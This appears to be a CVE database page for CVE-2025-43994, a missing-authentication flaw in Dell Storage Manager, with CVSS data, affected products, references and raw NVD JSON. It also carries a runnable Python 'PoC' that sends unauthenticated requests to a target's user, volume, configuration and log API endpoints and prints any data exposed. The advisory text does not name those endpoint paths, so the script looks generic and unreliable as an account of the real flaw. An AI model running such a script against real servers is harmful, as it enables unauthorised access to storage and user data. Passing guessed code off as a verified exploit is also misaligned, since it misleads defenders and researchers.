CVE-2025-43994

Description

Dell Storage Center - Dell Storage Manager, version(s) DSM 20.1.21, contain(s) a Missing Authentication for Critical Function vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:storage_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:dell:storage_manager:2020:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:dell:storage_manager:2020:r1.10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:dell:storage_manager:2020:r1.2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:dell:storage_manager:2020:r1.20:*:*:*:*:*:* - VULNERABLE

Dell Storage Manager DSM 20.1.21

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-43994 PoC - Missing Authentication in Dell Storage Manager
# Target: Dell Storage Manager DSM 20.1.21
# Vulnerability: Missing Authentication for Critical Function

def exploit_dell_storage_manager(target_url):
    """
    PoC for CVE-2025-43994
    This demonstrates the missing authentication vulnerability
    in Dell Storage Manager critical functions.
    """
    
    # Sensitive endpoints that should require authentication
    endpoints = [
        "/api/v1/storage-arrays",
        "/api/v1/volumes",
        "/api/v1/configurations",
        "/api/v1/users",
        "/api/v1/logs"
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-43994: Missing Authentication\n")
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        
        try:
            # Send unauthenticated request
            response = requests.get(url, timeout=10, verify=False)
            
            print(f"[+] Endpoint: {endpoint}")
            print(f"    Status: {response.status_code}")
            
            if response.status_code == 200:
                print(f"    Result: VULNERABLE - Data exposed")
                print(f"    Data length: {len(response.text)} bytes")
                if len(response.text) > 0:
                    print(f"    Sample: {response.text[:200]}...")
            else:
                print(f"    Result: Not vulnerable or endpoint not found")
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")
        print()

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} https://dell-dsm.example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_dell_storage_manager(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43994
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43994
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43994/
[4] VulDB https://vuldb.com/cve/CVE-2025-43994
[5] https://www.dell.com/support/kbdoc/en-us/000382899/dsa-2025-393-security-update-for-storage-center-dell-storage-manager-vulnerabilities

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43994", "sourceIdentifier": "[email protected]", "published": "2025-10-24T15:15:38.187", "lastModified": "2025-11-04T14:31:14.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Storage Center - Dell Storage Manager, version(s) DSM 20.1.21, contain(s) a Missing Authentication for Critical Function vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "2020", "matchCriteriaId": "F19B1117-55A1-46EC-A046-BE3B99EC4900"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:2020:r1:*:*:*:*:*:*", "matchCriteriaId": "567442CC-381B-43A1-ADE9-AE00075021D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:2020:r1.10:*:*:*:*:*:*", "matchCriteriaId": "B978EFB1-877F-4091-A401-F1861229E033"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:2020:r1.2:*:*:*:*:*:*", "matchCriteriaId": "263E78BD-D8C0-480F-9EED-D5496708CFCD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:2020:r1.20:*:*:*:*:*:*", "matchCriteriaId": "1055DB85-9105-44E5-9CEB-509C7F7041FE"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000382899/dsa-2025-393-security-update-for-storage-center-dell-storage-manager-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}